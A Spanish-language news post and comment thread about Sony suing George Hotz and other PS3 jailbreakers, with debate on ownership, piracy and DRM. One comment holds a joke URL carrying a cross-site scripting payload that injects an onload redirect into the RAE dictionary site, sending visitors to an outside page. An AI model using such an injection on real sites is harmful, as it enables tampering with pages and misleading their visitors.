Hace 13 años | Por NoRiCKaBe a redmondpie.com
Publicado hace 13 años por NoRiCKaBe a redmondpie.com

Sony ha presentado una demanda contra George Hotz, Sven Peter y Hector Martin por los recientes avances realizados en el jailbreak de su sistema PS3, al hacer públicas las claves de firmado de las aplicaciones. El pasado Julio un tribunal declaro legal el jailbreak en iPhone ya que no guardaban relación directa con la piratería, y su finalidad principal era la de ejecutar código casero en los terminales. Copia de la denuncia en http://geohot.com/Motion%20For%20TRO.pdf

Comentarios

MR_samson

#8 "Si la máquina la he comprado, es mia" me la follo cuando quiera :P. Si que tienes razón, faltaría más que no pudiésemos hacer lo que nos sale de la gaita con nuestros aparatos electrodomésticos, sólo falta que pongan una cláusula para poner la PS3 en medio del salón y orarle todos los días.

D

#8 Estimado Sr. Robus. Nuestro cliente Sony Corporation ha puesto en nuestro conocimiento que usted está usando un sistema de entretenimiento propiedad de Sony Corporation como tope de una puerta, lo cual difiere de su uso original como plataforma de videojuegos.

Le hacemos saber que está usted inflingiendo la cláusula 3.32 del contrato del usuario y por ello puede usted ser castigado por la ley, con condenas que van desde la suspensión de su cuenta en Playstation Network hasta la cadena perpetua en una cárcel de máxima seguridad y mínima higiene.

Le recomendamos que en el plazo máximo de 24 horas cese con sus actividades ilegales y no autorizadas.

Un saludo.

M. Jhonson. Bufete

blid

#10 Desconozco el asunto pero creo recordar que cuando actualizas el Firmware de la PS3 debes aceptar un nuevo contrato.

d

#12 Pero no nos confundamos. Geohot no ha descubierto la forma de obtener las claves, fue el team overflow (o como se llamen, vamos que fue otro grupo de hackers distinto). GeoHot en su día dijo que era imposible hackear la ps3 y abandonó.

GeoHot solamente empezó a desarrollar con los descubrimientos de este team.

ChingPangZe

Si realmente Sony no puede hacer nada ya para evitar el soft casero en la PS3 ya son ganas de hacerse mala publicidad con estas demandas, porque lo que es dinero o reconocimiento no creo que saque.

frankiegth

Para #9. Es una vez más un intento de usar la política 'del miedo', ampliamente utilizada por gobiernos y empresas en todo el mundo, para que a nadie se le pase por la cabeza actuar con libertad con lo que cada uno de nosotros hace en casa con sus cosas.

Nunca he comprado ni compraré nada de SONY, por convicción, pero me parece genial que estos HEROES (con mayúsculas) les hayan liberado sus máquinas contra su voluntad.

No decía SONY que lo iban a solucionar con un PARCHE??? Parece que el PARCHE va a ser una demanda... lol lol lol

SONY, pide disculpas a tus clientes y comportate como es debido!

pawer13

#9 De los creadores del rootkit para Windows, de los portátiles Vaio y de las tarjeta de memoria el doble de caras que las SD, ahora tenemos...

Creo que lo de ser los malos de la película lo tienen ya asumido

p

#44 buenísimo te has dejado el Bluray!

D

#49 y el Beta y el Minidisc... esos grandes éxitos

w

#64 sisisisi ...aro aro aro

Saludos

D

Como si ellos tuvieran la culpa de que el sistema sea una mierda y tuviera un agujero de seguridad de tal importancia

marchando una buaaambulancia

Jiraiya

Vamos, como no puedo poner puertas al campo, lo riego con napal.

Yo tengo la ps2 (sin piratear con más de 40 juegos), la ps3 pirateada con más de 10 juegos comprados.

Soy un "pirata" pero un pirata que consume (=gasta pasta) muchos videojuegos.

Si compro 10 juegos y me descargo otros 10, ¿soy tan malo? Si bajaran los precios compraría 20 y me descargaría 0. Yo compro juegos a 25 euros nuevo o de segunda mano, pero paso de gastarme 69 euros en juego que no me dejan ni probar.

Ya me ha pasado con juegos de la ps2 que pagaba 50 euros y que no he jugado ni 3 minutos reales con ellos, porque no tienes forma de probarlo o conocer realmente cómo está hecho el juego.

p

¿no decían que con una simple actualización via ps network lo tendrían solucionado? a ver si es que era un farol y no es tan sencillo...

D

Ehh Las TOS (terms of service) y las EULA (end user liscence agreement) son bastante libres de pedir tu primer hijo y un riñon si incumples cualquier estupidez que ellos crean pertinente.

Video explicando como se "abre" la PS3

[ENG] donde explica algunos de los fallos. Son 45 minutos, pero es bastante educativo (si sabes ingles).

El comentario mas importante es que la anterior, que podia usar Linux de forma natural, sin ningun hack, no fue hackeada ya que no habia ningun incentivo para hacerlo. A la que no dejas usar linux, se abren, pero normalmente por el camino llegas mucho mucho antes a poder usar juegos copiados a no instalar otro sistema operativo.

#17 Han suprimido el video. ¿Sabes de algún otro enlace para poder visualizarlo?

D

#67 #58 Que no toquen lo que no suena, http://www.eurogamer.net/articles/digitalfoundry-ps3-security-in-tatters no es video (se que es mas comodo) pero pone las partes interesantes y muestra la parte del video que es de interes en este caso.

frankiegth

Para #58. Goto #70 y #71.

frankiegth

Para #17. Comienza la censura. Han retirado el video.

Pronto correrá por el Emule.

frankiegth

Para #17. Lo sabía! Ya pueden encontrarse los videos de la conferencia de hacking de la PS3 EPIC FAIL con el Emule configurándolo para la red KAD.

Eston son los nombres de los archivos de video (28 megabytes cada uno) :

PS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_1_-_Chaos_Communication_Congress.flv

PS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_2_-_Chaos_Communication_Congress.flv

PS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_3_-_Chaos_Communication_Congress.flv

PS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_3_-_Chaos_Communication_Congress.pdf (Es la presentación en PDF de 9 megabytes).

ed2k://filePS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_3_-_Chaos_Communication_Congress.flv273918020522908C7576C70375D6B59C0C514E22h=4BHA7LWRFV2UDXP5W2SJE2XP6YILOC2M|/

ed2k://filePS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_2_-_Chaos_Communication_Congress.flv2603133544911C6D777DD2810E9202EE6284A061h=PILCH3U2GKMSHCOFTXNPUHWKHDOWP3HP|/

ed2k://filePS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_1_-_Chaos_Communication_Congress.flv28777542E0EA8379EBC5CD2F42CAE0662FCCE210h=SRH2IXNUPW2Z7AZV74PGC25EJG32TYTM

La censura de SONY a la basura.

frankiegth

Edit #70. Para #17. Y el enlace ED2K para el Emule al archivo presentación en PDF :

ed2k://filePS3_EPIC_FAIL_-2011-_PSGroove.com_-_Console_Hacking_2010_Part_3_-_Chaos_Communication_Congress.pdf915178355275E7EC7E487FF7AF8A611E3746515h=UJXB4YLWBFFQ7R3PQ5PP3F23WGKJB5X6|/

SONY, seais bienvenidos al fin de la censura.

D

Esto se llama derecho a pataleta.

Saben que no van a conseguir nada, o como mucho, el ya famoso efecto Streisand.

klam

#14 Esto se llama derecho a pataleta.

Ius patalendis, en la jerga legal.

NoRiCKaBe

#4 gracias, al principio lo he puesto con v, pero el corrector ortográfico de Mac me ha jugado una mala pasada lol

Juro que me parecía rarísimo que fuese con B en vez de con V, última vez que me fío de el corrector automático.

A ver si algún alma caritativa se apiada y lo corrige.

D

#5 Jum, pues... deberías revisar si tienes algo raro, a mí me salta con "rebentar", pero en cambio reventar me la da como buena y no me la remarca.

Algo extraño hay por ahí, sería un fallo demasiado garrafal incluso para venir de americanos.

y

#5, imposible. Si los Macs son la repolla!

palitroque

#5 El corrector es de Mac o de Firefox?

autokrator

#35 también puede rectificar con el tema de Linux y despedir al lumbreara que cita #33

l

#4 http://buscon.rae.es/draeI/SrvltConsulta?TIPO_BUS=3&LEMA=XSS%22onload%3D%22r%3D'http://www.suicidesoft.com/rae/definition.php%3Fn%3DcmViZW50YXI%3D%26l%3DcmV2ZW50dXM%3D%26d%3DRGVzaGFjZXIgbyBkZXNiYXJhdGFyIGFsZ28gYXBsYXN04W5kb2xvIGNvbiB2aW9sZW5jaWEu';d%3Dparent.formularios;if(d.location!%3Dr)d.location%3Dr;%22
Any problem?
Ahora hablando en serio, Sony y otras compañías similares va de mal en peor... si te compras el dispositivo, debería ser tuyo no sólo para pagarlo, sino para todo lo que quieras hacer con él.

D

Pues al llegar a casa pienso meterle el jailbreak. Desde que instalé obligatoriamente la 3.55, los juegos (originales todos) se me quedan colgados.

Si Sony no me da soluciones, y GeoHot sí, me paso al bando de GeoHot.

Qué cara tengo, querer utilizar mi consola de casi 600€ y juegos de 60-70€ sin que falle siempre! Qué egoísta!

Sony que te den

D

El objetivo de este hack es usar aplicaciones caseras, no puede hacerse backups de juegos aunque alguno ha hecho funcionar algun juego, pero no esta pensado para piratear si no para ejecutar aplicaciones...
Como instalar software casero en la PS3 3.55 paso a paso, ejemplo emulador NES

Hace 13 años | Por --23023-- a felixmoreno.com

Jiraiya

Actualmente nuestra legislación permite la modificación de cualquier tipo de maquinaria, consola o equipo, siempre y cuando la modificación no sirva única y exclusivamente (aquí está la madre del cordero) para la carga de copias ilegales o piratas que vulneren los derechos contemplados en la ley de la propiedad intelectual.

Así que si mi PS3Key (un modchip clon del ps3jailbreak) me deja cargar homebrew (http://es.wikipedia.org/wiki/Homebrew), Y ME DEJA, es completamente legal, aunque también me cargue mis fantásticos backups de juegos.

w

#21 C&P "Así que si mi PS3Key (un modchip clon del ps3jailbreak) me deja cargar homebrew (es.wikipedia.org/wiki/Homebrew), Y ME DEJA, es completamente legal, aunque también me cargue mis fantásticos backups de juegos. "

Pero es que para que tus backup de juegos sean legales... no te asiste el derecho de copia privada, en SW no existe como tal, aparte de que cuando compras un juego... no es tuyo, solo pagas por el derecho a usarlo (la comunmente llamada licencia ) aparte de...

http://www.elotrolado.net/hilo_nueva-sentencia-avala-la-copia-de-seguridad-de-videojuegos_1319550

C&P "Ahora bien, lo único que ha quedado probado es que el acusado hizo una copia de seguridad de los juegos originales para su propio uso y para sus propias necesidades tales como la reparación de los juegos que compraba y que comercializaba en su establecimiento, no habiendo quedado acreditado sin embargo que hiciera copias de los juegos originales para alquilarlas o venderlas en su propio beneficio según se le imputa, entendiéndose de conformidad con lo establecido en el articulo 31 de la Ley de Propiedad Intelectual que para realizar la copia de seguridad para su propio uso no necesitaba la autorización de nadie [...]"

Basicamente quiere decir, que o presentas el original de tu Backup de videojuego o de legal nada

Saludos

Jiraiya

#55 Yo he dicho que el modchip es legal, de los backups no he dicho nada

D

Mal Sony mal...
Para mi lo ideal hubiese sido, por un lado dejar la puerta abierta para homebrew y la instalacion de SO. Por el otro lado, cerrojazo del 15 a la pirateria de juegos.
Todo esto acompañado con una rebaja del 50% en el precio inicial de los juegos.

Mi humilde opinion.

D

Yo con tal de que se le pueda poner un Linux y funcione sin restricciones, me doy por conforme.

Vamvan

Es curioso que sony en 3 años y medio que duro el otherOS. Lo quitan y en menos de 10 meses tienes tu sistema impirateable mucho mas mancillado que la competencia. Cuando se hacen las cosas bien desde un principio se nota. Ahora bien, cuando la cagas ....

Sony es todo un WTF!!! Inexplicable.

avalancha971

Yo creía que Geohot era el único que había hecho pública la clave, y los demás sólo los métodos para obtenerla, lo cual imagino que legalmente será muy distinto.

Jack-Bauer

Sony sabe (no son tan tontos) que tiene la batalla perdida... pero el caso es que ellos tienen dinero para costearse abogados y poner demandas hasta que los otros se aburran y dejen el proyecto.

h

Buambulancia para Sony.

Gonzo345

Sony lo único que puede hacer a parte de lo que acaba de hacer, es seguir llorando.

d

en vez de denunciarles... deberían contratarles

D

Estos de SONY son GILIPOLLAS. Varios de los mejores crackers/hackers del mundo te demuestran que son mejores en su trabajo que los mejores trabajadores de tu compañía (reventando tu sistema), te están diciendo que les gustaría trabajar para tí, ¿Y LES DENUNCIAS?

Lo dicho. Gilipollas.

pip

#59 ¿Tu pondrías al zorro a cuidar de las gallinas?

Sobrestimáis a los susodichos. Claro que son hábiles, pero no los únicos hábiles ni los más hábiles. Hay mucha gente que tiene capacidad de hacer eso mismo, simplemente no se dedican a ello, porque no son crackers.
Incluso, dentro de los pocos que se dedican al cracking, no todos obviamente están interesados en crackear específicamente una consola de videojuegos.

En este juego, el que ataca siempre tiene ventaja sobre el que defiende. Es más sencillo abrir una cerradura que diseñar una cerradura que no pueda abrirse. Ni mucho menos los crackers son mejores ingenieros que los que han diseñado el sistema de protección.

Nota que constantemente estoy escribiendo crackers y no hackers. En mi humilde opinión, como suele decirse, romper un sistema de protección y publicar las claves es incompatible con la ética hacker. Si lo que buscaban era un desafío intelectual y que Sony les contratase, hubiese bastado con adjuntar 'media' clave en su CV y no hacerlo público jamás.

D

Más publicidad que noticia, que lástima de panorama...

Nandove

De todo esto hay un gran perjudicado, y no es Sony, Sony venderá consolas a mansalva ahora que son hackeables, el perjudicado será el jugador legal que habiendo comprado su PS3 y cumpliendo las exigencias(algunas moralmente reprochables) de la cluf de Sony, ahora tendrá una experiencia online de PENA, por que si los "cheteros" ahora pueden jugar online con copias hackeadas y firmadas de los juegos, la habremos liado pardisima, jugadores "piratas" con ventajas evidentes y Sony sin poder detectarlos, ¿deberian retocar el online de TODO el catalogo existente? ¿quien lo debe hacer Sony, o las desarrolladoras? y esto es lo que le jode de verdad a Sony, que su Live está oficialmente tocado de muerte.

¿Deberian ahora esos usuario del live de Sony demandar a Sony por incumplir la experiencia de juego prometida?

pawer13

#56 No lo veo tan grave, cualquier juego puede sacar una actualización para añadirle seguridad: tan sencillo como hacer un hash de ciertos archivos para comprobar que no han sido modificados y, si lo han sido, no dejarles entrar a las partidas hasta que vuelvan a su estado original. Todos los juegos online de PC medianamente modernos (no, aquí no entra el Counter Strike) tienen este tipo de comprobaciones.

Thiago_Sei

Sony no decía que iba a arreglar esa cuestión inmediatamente? (hablando técnicamente). Ahora recién se dan cuenta que no tiene solución técnica alguna y como último recurso acceden a la ley.

W

No entiendo mucho de estas cosas pero si estos chicos hubiesen querido hacer daño de verdad a Sony con haber esperado a la salida de Ps4 y haber publicado entonces las claves del cifrado, en el supuesto de que Ps4 fuese retrocompatible claro, la hubiesen hundido convirtiéndola en una nueva Dreamcast.

D

[ROUND 1 FIGHT!!!]

SONY LOSE GEOHOT WINS!

[ROUND 2 FIGHT!!!]

SONY SUCKS ANOTHER TIME

PD:Es así como estaban arreglando el fallo de seguridad?¿ Que los contraten en vez de denunciarlos!!

a

Marcan tienes mi apoyo moral lol tio que fuerte, a ver si te sale un megacurro con esto, te felicito (le conozco)

C

#48 Ya tiene 2 ofertas y habla con propiedad,

"Me gustaría invitar a los lectores a que se unan al mundo del hacking. La palabra nos puede sonar un poco mal por el uso que se le da en la ficción (el “típico hacker de las películas”, que en realidad más bien se denominaría “cracker”)"

El precio que tendrá que pagar Sony por saltarse la ley de garantías a la torera (quitar funcionalidades) les va a salir mas caro de lo que creían.

D

Es curioso que Geohot no fuese un nick inventado, sino que fuesen las propias iniciales del hacker... Tan listo para unas cosas, y tan tonto para otras...

D

#39 Miles de hackers hackean por el placer del hacking, sin buscar ser celebridades, famosos en la vida real. No es cuestión de no tener necesidad de ocultarse, sino que tampoco tenía necesidad alguna de ser famoso. Y por supuesto que es un ciudadano normal, no sólo él sino todos, ya que todos somos humanos.

He empezado el post con "tan inteligente para unas cosas..." y eso lo omites. Si un día acaba en la cárcel por haber perdido el anonimato, seguro que él es el primero en deducir que tal vez tendría que haberse mantenido siempre en el anonimato, como han hecho tantos otros grandes. Entonces yo habría tenido razón con mi comentario, pero supongo que para entonces la gente que salta a la primera como tú ya me habrá cosido a negativos.

Y recuerda que la vanidad es un defecto que puede padecer hasta el más inteligente, lo que no la convierte en sensatez.

frankiegth

Para #42. Es totalmente imposible que acabe en la carcel teniendo en cuenta algo tan sencillo como que su actividad está totalmente dentro de la legalidad. Eres tú quién está buscando fantasmas donde ni tan si quiera los hay. Creo sinceramente que confundes 'vanidad' con 'expontaneidad' y ganas de compartir y defender las propias ideas.

En la era de Internet, todos tenemos opción de poder ser 'protagonistas' por un día, por decirlo de algún modo.

D

Pues yo me alegro y espero que se les quiten las ganas a los graciosos estos de ir jodiendo sistemas de seguridad ajenos.

El sistema de seguridad de PS3 no estaba puesto para que Sony se aprovechase de nadie,sino para proteger de manera completamente lícita unos videojuegos con unos costes de desarrollo terribles,así como una infraestructura de sistema tambien carísimo,con online,compañías asociadas,etc,etc.

No me gustaría quedarme sin todo eso por culpa de la piratería.No me parece que este sector sea comparable para nada al de la música o el cine,donde si se ve a todas luces que van a lo van...a sacarnos los cuartos todo lo que puedan sin currárselo a cambio.

Muy mal todo lo que ha sucedido con Ps3,sinceramente.Muy mal.

Cesc_

#28 Que den conciertos.

frankiegth

Para #28. ...No me parece que este sector sea comparable para nada al de la música...

Es más de lo mismo. Pareces ser de los que prefieren vivir la tecnología con grilletes, aunque cada día quedan menos porque muchas personas estan despertando por el camino.

Para #29. Conciertos quizás no, pero sí eliminación de sus restrictivas licencias, de forma que cualquiera pueda programar sus máquinas y producir software sin costes adicionales para su posible venta o distribución gratuita. Y si quieren vender, que se adapten al bolsillo de los clientes y no a la coacción de sus libertades sobre la tecnología que adquieren.

autokrator

#28 ¿Y tú como harías entonces para poder seguir ejecutando Linux en la PS3 que te vendieron como capaz de correr otros sistemas operativos?

pawer13

#28 ¿Sistemas de seguridad ajenos? Si la compro, es MI consola, por tanto es mi seguridad la que decido romper. No estoy atacando máquinas de otras personas, y si quiero ejecutar lo que a mí me de la gana en ella estoy en mi derecho mientras no sea ilegal (no estoy a favor de la piratería), y esta gente no ha atacado la PS3 hasta que Sony decidió dejar de permitir el uso de Linux.

p

#28 no lo entiendo, como usuario no lo entiendo. Comprendo que se deben remunerar a las empresas que deben crear los videojuegos, pero también respetar los derechos de los usuarios. Recuerda que han ido quitando funcionalidades. Yo se de amigos que se compraron la PS3 para jugar a juegos viejos también de la PS2, luego además quitaron lo de linux, etc.... ¿entonces? ¿nos debemos estar quietos? Comprendo a que se defiendan los intereses de los creadores, pero de una multinacional como Sony? que constamente castiga y penaliza a sus usuarios con sus formatos exclusivos e imposiciones? (véase MemoryStick, Bluray, PS2, PS3...)

Nova6K0

#28 Lo único que demuestra SONY a parte de la prepotencia habitual es que son unos chapuzas diseñando consolas. Porque cometer un error tan grave (imposible de reparar salvo que se rediseñe por completo la consola, lo que le supondría unas pérdidas abismales y ahí si que perderían no la falacia de una copia o descarga es una venta menos).

Salu2

musg0

#47 Es lo que tiene el DRM, que las llaves privadas se las das ocultas en la máquina a cada cliente y como tenga equipamiento, conocimientos y ganas te las puede sacar. Ningún sistema de seguridad en el que le entregues la llave y la cerradura al cliente puede ser seguro ya que éste puede investigar cómo combinarlas hasta encontrar la forma de abrirla.
Y tampoco se pueden poner a hacer consolas que dejen de funcionar al manipularlas porque seguro que habría daños colaterales en clientes legítimos que darían muy mala publicidad.